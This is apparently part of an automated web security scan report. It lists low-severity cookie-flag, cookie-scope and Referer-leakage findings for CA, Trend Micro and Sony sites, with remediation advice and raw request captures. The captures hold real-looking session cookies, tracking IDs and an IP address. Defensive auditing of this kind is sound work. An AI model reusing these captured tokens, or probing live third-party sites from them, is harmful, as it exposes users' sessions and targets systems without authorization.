POST /siteminderagent/forms/login.fcc HTTP/1.1/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192_EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
HTTP/1.1 302 Object Moved=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3dset-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
10.3. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OKSet-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11. Cookie scoped to parent domain
previous
next
There are 2 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
11.1. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
Request
POST /siteminderagent/forms/login.fcc HTTP/1.1/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192_EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
HTTP/1.1 302 Object Moved=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3dset-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
11.2. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OKSet-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
12. Cross-domain Referer leakage
previous
next
There are 12 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
12.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://blog.trendmicro.com/?p=12640 http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://blog.trendmicro.de/ http://countermeasures.trendmicro.eu/ http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://edge.quantserve.com/quant.js http://free.antivirus.com/ http://libs.coremetrics.com/eluminate.js http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://twitter.com/share http://widgets.twimg.com/j/2/widget.js http://www.facebook.com/Trendmicro http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&layout=button_count&show-faces=false&width=83px&action=like&colorscheme=light http://www.google.com/bookmarks/mark?op=edit&bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.newsvine.com/_tools/seed&save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.simplysecurity.com/ http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.twitter.com/TrendLabs http://www.youtube.com/trendmicroinc
Request
GET /?p=12640 HTTP/1.1/us/search/?q=xss&search.x=2&search.y=10&search=search/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK.com/xmlrpc.php.com/12640>; rel=shortlink.com/?p=12640>; rel=shortlink/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" dir="ltr" lang="en-US">...[SNIP]... <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <area shape="rect" coords="22,14,57,48" href="http://www.facebook.com/Trendmicro" target="_blank" alt="Trend Micro Facebook"> <area shape="rect" coords="62,15,99,47" href="http://www.twitter.com/TrendLabs " target="_blank" alt="TrendLabs Twitter"> .trendmicro.com/Anti-MalwareBlog/" target="_blank" alt="Malware Blog RSS Feed"><area shape="rect" coords="142,14,180,49" href="http://www.youtube.com/trendmicroinc" target="_blank" alt="You Tube - Trend Micro"> ...[SNIP]... <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" ...[SNIP]... -top:4px;"><iframe src="http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&layout=button_count&show-faces=false&width=83px&action=like&colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:83px; height:21px;" allowtransparency="true"> </iframe>...[SNIP]... <a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/" data-text="XSS Methods Also Seen Being Used in Mass Compromises" data-count="horizontal"> Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... <a title="Technorati" rel="nofollow" href="http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="Technorati" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/technorati.png" alt="Technorati" border="0" /></a> <a title="NewsVine" rel="nofollow" target="_blank" href="http://www.newsvine.com/_tools/seed&save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" > <img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/newsvine.png" title="NewsVine" alt="NewsVine" border="0" /></a> <a title="MySpace" rel="nofollow" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="MySpace" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/myspace.png" alt="MySpace" border="0" /></a> <a title="Google" rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="Google" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/googlebookmark.png" alt="Google" border="0" />...[SNIP]... <a title="del.icio.us" rel="nofollow" href="http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="del.icio.us" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/delicious.png" alt="del.icio.us" border="0" /></a> <a title="StumbleUpon" rel="nofollow" href="http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="StumbleUpon" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/stumbleupon.png" alt="StumbleUpon" border="0" />...[SNIP]... <script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <a href="http://countermeasures.trendmicro.eu/" target="_blank"> CounterMeasures Blog </a>...[SNIP]... <a href="http://www.simplysecurity.com/" target="_blank"> Simply Security News</a>...[SNIP]... <a href="http://blog.trendmicro.de/#" target="_blank"> Trend Micro Blog [German]</a>...[SNIP]... <a href="http://free.antivirus.com/" target="_blank"> <img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/blogimages2010/freetools.jpg" alt="Trend Micro Free Tools" width="140" height="192" border="0">...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script><img src="http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> ...[SNIP]... <script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/flash-gallery/js/addOnLoad.js
Issue detail
The page was loaded from a URL containing a query string:http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1
Request
GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1.com/?p=12640;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK".wordpress.org/changeset/6482*/(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi...[SNIP]... (i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0> <\/scr"+"ipt>...[SNIP]...
12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8 http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">-Compatible" content="IE=8" />...[SNIP]... <script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> ...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> ...[SNIP]... <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> ...[SNIP]... <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <a rel="Body_Tier 1_Media Remote App for iPhone/iPad CTA".com/us/app/media-remote-for-iphone/id373459732?mt=8#" ...[SNIP]... <a href="https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result" ...[SNIP]... <a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... ryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" </noscript>...[SNIP]...
12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
